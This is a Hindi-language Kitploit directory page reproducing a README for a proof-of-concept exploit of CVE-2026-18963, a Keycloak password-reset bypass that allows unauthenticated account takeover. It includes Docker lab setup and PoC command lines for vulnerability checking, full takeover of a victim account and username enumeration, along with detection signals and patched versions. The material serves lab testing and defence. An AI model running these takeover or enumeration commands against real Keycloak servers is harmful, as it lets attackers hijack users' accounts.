Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Keycloak_CVE-2026-18963_PoC — यह रिपॉजिटरी cve-2026-18963 का poc है। कृपया इसे केवल कानूनी उत्पादों (लैब, लोकल, ...) पर उपयोग करें। | Kitploit
उपकरण/GitHubGitHub/prot0tw/keycloak_cve-2026-18963_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलैब और अभ्यास
GitHubprot0tw/keycloak_cve-2026-18963_poc

Keycloak_CVE-2026-18963_PoC

यह रिपॉजिटरी cve-2026-18963 का poc है। कृपया इसे केवल कानूनी उत्पादों (लैब, लोकल, ...) पर उपयोग करें।

रिपॉजिटरी देखें
122 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-18963

Keycloak reset-credentials बाईपास → बिना प्रमाणीकरण के खाता अधिग्रहण CVSS 9.1 | प्रभावित: Keycloak 26.0.0 – 26.7.1

यह लैब snizi/cve-2026-18963-exploit के मूल README से पुनर्निर्मित है।


लेआउट

root@kitploit:~
CVE-2026-18963/
├── cve_2026_18963_poc.py   <- PoC स्क्रिप्ट (Python 3.9+, केवल stdlib)
├── README.md
├── docker-compose.yml      <- लैब वातावरण
└── realm-poc.json          <- Keycloak realm कॉन्फ़िग (स्वतः-आयातित)

आवश्यकताएँ

  • Docker + Docker Compose
  • Python 3.9+ (केवल मानक लाइब्रेरी, कुछ भी इंस्टॉल करने की आवश्यकता नहीं)
  • Linux

चरण 1: लैब शुरू करें

root@kitploit:~
docker compose up -d

या realm आयात के बिना, Keycloak को सीधे चलाएँ:

root@kitploit:~
docker run -p 127.0.0.1:8080:8080 \
  -e KC_BOOTSTRAP_ADMIN_USERNAME=admin \
  -e KC_BOOTSTRAP_ADMIN_PASSWORD=admin \
  quay.io/keycloak/keycloak:26.7.1 start-dev

Keycloak के बूट होने में ~30–60 सेकंड प्रतीक्षा करें।

सेवाएँ

सेवाURLसंस्करणस्थिति
kc-vulnhttp://localhost:808026.7.1कमज़ोर ⚠️
Mailpithttp://localhost:8025latestईमेल कैप्चर करता है

डिफ़ॉल्ट क्रेडेंशियल

  • Keycloak एडमिन: admin / admin
  • पीड़ित उपयोगकर्ता: victim / OriginalPassw0rd!
  • Realm: poc | क्लाइंट: poc-app
  • कॉन्फ़िग सत्यापित करें: Realm settings → Login tab → Forgot password ON है।
  • यदि poc realm या victim उपयोगकर्ता गायब है, तो इसे मैन्युअल रूप से आयात करें: Manage realms → Create realm → Upload realm-poc.json।

चरण 2: PoC चलाएँ

सुरक्षित जाँच (कोई उपयोगकर्ता नाम आवश्यक नहीं, कोई साइड इफ़ेक्ट नहीं)

root@kitploit:~
python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --safe-check

kc-vuln पर अपेक्षित परिणाम: [!] VULNERABLE — email gate execution served


गैर-विनाशकारी प्रमाण (Update Password फ़ॉर्म पर रुकता है)

root@kitploit:~
python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --victim victim --check

साइड इफ़ेक्ट: पीड़ित को एक रीसेट ईमेल भेजा जाता है (इसे http://localhost:8025 पर देखें), और emailVerified को true पर सेट किया जाता है।


पूर्ण अधिग्रहण

root@kitploit:~
python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --victim victim \
  --new-password 'PoCPassw0rd!1'

बाद में, http://localhost:8080/realms/poc/account पर victim / PoCPassw0rd!1 के साथ लॉगिन करके सत्यापित करें।


उपयोगकर्ता नाम गणना

root@kitploit:~
printf 'victim\nadmin\nnobody\n' > userlist.txt

python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --enum userlist.txt

चरण 3: पीड़ित को उसकी प्रारंभिक स्थिति में रीसेट करें

Realm केवल पहले बूट पर आयात किया जाता है, इसलिए सबसे सरल रीसेट वातावरण को शुरू से फिर से बनाना है:

root@kitploit:~
docker compose down -v && docker compose up -d

वैकल्पिक रूप से, एडमिन कंसोल (http://localhost:8080/admin) में पासवर्ड मैन्युअल रूप से रीसेट करें: Users → victim → Credentials → Reset password → OriginalPassw0rd!।


टियरडाउन

root@kitploit:~
docker compose down -v

डिटेक्शन सिग्नल

सिग्नलवैधएक्सप्लॉइट
GET /login-actions/action-token?...✅ हाँ❌ नहीं
POST .../reset-credentials बॉडी tryAnotherWay=yes के साथ❌ नहीं✅ हाँ
SEND_RESET_PASSWORD → UPDATE_PASSWORD समान code_id के साथ < 2 sदुर्लभ✅ हमेशा
emailVerified बिना VERIFY_EMAIL इवेंट के true हो जाता है❌✅ हमेशा

Mailpit (http://localhost:8025) में पासवर्ड-रीसेट ईमेल पीड़ित के मेलबॉक्स में आता है, लेकिन एक्सप्लॉइट सफल होने पर उसके अंदर का लिंक कभी क्लिक नहीं किया जाता।


प्रभावित संस्करण

रिलीज़ लाइनप्रभावितफिक्स
≤ 17 (WildFly)नहीं—
26.0 – 26.326.0.0 – 26.x.xकोई नहीं (26.7.2 पर जाना होगा)
26.426.4.0 – 26.4.1426.4.15 (विक्रेता बैकपोर्ट)
26.526.5.0 – 26.5.7कोई नहीं
26.626.6.0 – 26.6.526.6.6 (विक्रेता बैकपोर्ट)
26.726.7.0 – 26.7.126.7.2 ✅

26.0 से पहले के संस्करण प्रभावित नहीं हैं: स्टिकी AUTHENTICATION_SELECTOR_SCREEN_DISPLAYED नोट और रीसेट फ़्लो में "Try another way" चयनकर्ता स्क्रीन 26.0.0 में पेश की गई थी। पुराने बिल्ड में केवल कमज़ोर कोड पथ का अभाव है — यह पैच किए जाने के समान नहीं है।


संदर्भ

  • Sploitus (मूल README): https://sploitus.com/exploit?id=A76D2FC5-1440-568B-81C2-B0213465485E
  • Keycloak मुद्दा: https://github.com/keycloak/keycloak/issues/51833
  • फिक्स PR: https://github.com/keycloak/keycloak/pull/51844
  • GHSA: GHSA-4gv3-mc9p-5wqc
  • Red Hat: https://access.redhat.com/security/cve/cve-2026-18963
टूल डाउनलोड करें